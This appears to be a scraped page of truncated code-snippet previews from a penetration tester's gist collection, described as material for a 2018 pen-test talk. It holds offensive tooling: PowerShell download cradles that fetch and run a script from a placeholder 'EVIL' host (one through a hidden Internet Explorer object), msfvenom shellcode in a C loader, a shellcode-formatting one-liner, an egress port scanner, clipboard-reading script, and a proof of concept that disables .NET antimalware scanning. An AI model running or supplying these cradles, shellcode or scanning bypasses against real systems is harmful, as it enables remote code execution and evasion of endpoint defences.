xenoscr

$results = @()
$global:progressPreference = 'silentlyContinue'

For ($i = 1; $i -le 65535; $i++)
{
	Write-Host "Testing Port: $i"
	Try
	{
		$request = wget -TimeoutSec 1 http://portquiz.net:$i -ErrorAction SilentlyContinue -WarningAction SilentlyContinue
		If ($request)

xenoscr

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;



/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

xenoscr

opcodes=<some string output from msvenom>

for j in `seq 0 8 ${#opcodes}`; do blockTXT=${opcodes:j:8}; echo -n "0x"; for i in `seq 7 -2 0`; do echo -n ${blockTXT:i-1:2}; done; echo -n ', '; done; echo ''

xenoscr

import socket

hostname, sld, tld, port = 'www', 'integralist', 'co.uk', 80
target = '{}.{}.{}'.format(hostname, sld, tld)

# create an ipv4 (AF_INET) socket object using the tcp protocol (SOCK_STREAM)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect the client
# client.connect((target, port))

xenoscr

<html>
		<head>
			<title>Can Clipboard?</title>
	</head>
	<body>
		<script type="text/javascript">
			navigator.clipboard.readText().then(clipText => document.writeln(clipText));
			//var test = window.clipboardData.getData('Text');
			//document.writeln(clipText);
		</script>

xenoscr

#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>

// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

xenoscr

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

xenoscr

// Gets a pointer to the PEB for x86, x64, ARM, ARM64, IA64, Alpha AXP, MIPS, and PowerPC.

// This relies on MS-compiler intrinsics.
// It has only been tested on x86/x64/ARMv7.

inline PEB* NtCurrentPeb() {
#ifdef _M_X64
	return (PEB*)(__readgsqword(0x60));
#elif _M_IX86
	return (PEB*)(__readfsdword(0x30));

xenoscr

function Subvert-CLRAntiMalware {
<#
.SYNOPSIS

A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

.DESCRIPTION

clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.

xenoscr

This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation